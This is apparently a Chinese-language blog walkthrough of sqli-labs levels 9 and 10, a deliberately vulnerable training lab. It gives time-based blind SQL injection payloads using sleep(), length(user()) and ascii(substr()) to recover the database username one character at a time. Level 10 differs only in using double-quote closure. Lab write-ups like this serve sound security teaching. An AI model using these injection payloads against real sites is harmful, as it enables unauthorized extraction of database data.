zoukankan      html  css  js  c++  java
  • sqli-labs第九,十题

    第九题

    1.注入单引号

    2.继续注入常用测试条件

     

     

     经过多次测试就可以发现,无论注入什么,页面的显示都一样,看不到任何有效的反馈

    3.根据本关的标题,尝试时间盲注

    构造如下Payload:

    ?id=1' and sleep(3)%23

     页面延迟了3秒说明注入成功

    4.利用时间盲注,爆破用户名

    查询用户名长度

    ?id=1' and if(length(user())=0,sleep(3),NULL)%23

    猜测用户名长度,直到页面出现3秒延迟

     爆破用户名

    通过逐个字符比对用户名的ASCII码,爆破用户名

    ?id=1' and if(ascii(substr(user(),1,1))=num,sleep(3),NULL)%23

    猜测ascii码值,直到页面出现3秒延迟

    得到第一个字符的ASCII码为114,同样的方法获取剩下13个字符的ASCII码。

    第十题

    与第九题相同,只是id参数使用了双引号闭合,将第九题的Payload中的单引号改为双引号即可。

  • 相关阅读:
    1,Window安装Docker
    字符串编码
    hive自带derby数据库初始化
    numpy深浅复制
    matplotlib基础学习
    pandas基础学习
    numpy基础学习
    pandas之join、merge
    pandas之索引
    pandas之时间戳
  • 原文地址:https://www.cnblogs.com/a-qi/p/13168942.html
Copyright © 2011-2022 走看看